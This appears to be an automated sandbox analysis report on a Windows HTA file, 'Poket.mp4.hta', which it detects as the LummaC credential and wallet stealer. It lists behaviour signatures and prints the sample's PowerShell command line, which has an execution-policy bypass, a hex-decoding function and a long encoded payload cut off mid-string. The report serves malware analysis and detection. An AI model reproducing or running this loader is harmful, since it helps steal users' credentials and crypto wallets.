Edit tour
Windows
Analysis Report
Poket.mp4.hta
Overview
General Information
Detection
LummaC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Yara detected MSILLoadEncryptedAssembly
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 6748 cmdline:
mshta.exe "C:\Users\ user\Deskt op\Poket.m p4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 4108 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction FRsZ n($zLKrb){ return -sp lit ($zLKr b -replace '..', '0x $& ')};$VU QBu = FRsZ n('C3A33C5 2A21C41B9F 45DD91B9A3 BF30CF2EC6 EDD823C9CE CE83AD4577 6A5B6CCA18 208E15A52D F5B7F83353 D6E23BD618 F30020318A A0658A8B92 02E85F7867 65CAAB181B 34D40F3E1A FBB439A245 57CA57621A 37BD3FD396 EFFD4A4478 91C80C3A87 A883D5313A DDB72306D4 1848117571 53E08EDD2E F4BECF0377 97B4B79F77 7C6223CC77 5BC4B03CC1 15C23AD159 6E113A7F8E 74EB4EEC5E 6D17A73F59 0BCA9BE30F E8DE26E4F3 F386BC2B0D F4C8B789F3 85D01CC9DE EFE7FFE963 CAD5B71510 5E46717C1F 8CA599AAC7 C726247B67 B2EF008D68 15624C48D8 921D6C026C 2D761B3C73 420E46D41E B38B2BE6DC 3A6E728398 BE20DF964E 092C95FFF6 4376795C2E B65F33EC36 20D8379266 68055A522E 8A88AC3164 B0FFA0FE44 948E6327C8 E69269E914 364F60006F 48EB7A2F98 30777B3C6B C5165322AC 78640320B0 B34D2AA9C9 EF97D71CAF 1BE1EDD212 144C4E5EDA 5048BFFD67 A1DAE7B36D 7277064EDF 983455E52E 8A0A77BCEF 0FA38AB0C8 D4EA1FCA20 A03B622CFD 25F156452A 918D62CCD8 0D0060DF53 2D92D537F9 E1ECC41864 005C3C9E06 7C14930765 854957EFB5 E71DDA020E 9C8287B2F9 61F0BDC387 138260ABC4 5FB51EA8AE 2B650D5B9C 6E9C568758 0B83CC67FA ABC67D5907 02C85406AB 842938C670 0BDEE21992 168619BEA1 6916FB865D C5F6DF6D9F 4F1B2CCA2D 2BF385A560 E8F04C7653 55464B3F06 BDD88EA77E 44A2D1776F 2B6CD01864 CFEE829FB1 7A5E70D006 D79C119DC5 F57A9A25AA 984AA5B170 4215FFBC39 398A42CB74 F3594AA3D5 6DAE65B45E 14CC7B4611 364CE10E2A 98948A4408 130F9C618D 3F505B0189 49F27C940B 9058868E15 2DD2A4787F 24AD17BF0A 1F6BF9DF71 7F3BFD33DC 5A1972C391 9F13AEE4CB 268C7DC3F5 4CF3AC0EE2 BA15D2C8D8 2C9A8C7B8B 2A0FD03B7A A09EA4F38E 2B6FD1C519 EACEDAE21D 18FB3B6CBB 0A3CD5570D E3F6C90D36 EAA1E06374 3143EBA60B 985DE8361C 93EC0D22BC AD34D88804 A5C111C47C 68EE0D30AC 9C64F3AE88 BA57295F33 3C3B513E91 EF96441C28 1655217BA1 DE5C3FDEC2 419E6DDAC5 38710D679F F0DF83B2EB E940E13671 1ED6C3C0FB FAD98C9CD7 FCEEB34152 07ACAAA8F0 91CDD9D584 DB90BD37D6 E6AA2BE9E6 344E6C4A74 A99DBC82A7 8E28F9AABA 7BAB79EF7E CD2EC5397E 326870A7A5 1E0D74D954 C0215E1BAA 229E0816AA BBCB00A251 73C21E3135 11B1C978FD 55355ADFBF 4E15EBD0A9 B52C25E32E A220C9D9DB ACD18EE9CE EC99257188 138D0ABBD2 9C4DFFC9B9 60A9CEC94D F767700576 A1EF94D8B5 F25088C95C B11F2AC671 514479E656 8DF04F0355 3A96075899 26AABEEDCE 4449E803E1 02F7E84665 C1EDBE23E8 C0D5DFAB8C 81BC5277AA AA134C26CD 84C912045F EE79030EAF 24569738BD C109FE8349 634563C2F5 EE96E70C69 32AF1AB2C2 7F468AA44A 2B4E2ABEBB 52F245AB3E 0B51A5D301 366672FE9F 491D4F1038 B32F46286F 25D8D40248 A896053E14 BE3DA4565A B47483A26A B50D34AF15 BFC76980B0 8272D58F9C AB8F88E131 42E13805C1 ECA94D3C79 34EAB6A74C 1BAA74CD73 4574037B04 3E95C8086C FE97D42C4B 9A7F1C21BC 9FE6FFEC1D AF361C9A76